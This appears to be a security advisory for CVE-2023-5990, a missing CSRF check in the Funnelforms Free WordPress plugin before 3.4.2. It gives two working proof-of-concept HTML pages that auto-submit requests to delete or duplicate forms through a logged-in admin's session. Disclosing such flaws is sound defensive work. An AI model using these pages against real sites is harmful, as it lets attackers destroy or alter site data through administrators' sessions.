Funnelforms Free < 3.4.2 – Form Deletion/Duplication via CSRF | CVE 2023-5990

Description

The plugin does not have CSRF checks on some of its form actions such as deletion and duplication, which could allow attackers to make logged in admin perform such actions via CSRF attacks

Proof of Concept

Make a logged in admin open an HTML page with the form below 

Deletion (This will delete the form with ID 1)
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8081/wordpress/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="af2&#95;fnsf&#95;delete&#95;posts" />
      <input type="hidden" name="post&#95;ids&#91;&#93;" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Duplication (This will duplicate the form with ID 2)
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://example.com/wordpress/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="af2&#95;fnsf&#95;copy&#95;posts" />
      <input type="hidden" name="post&#95;ids&#91;&#93;" value="2" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>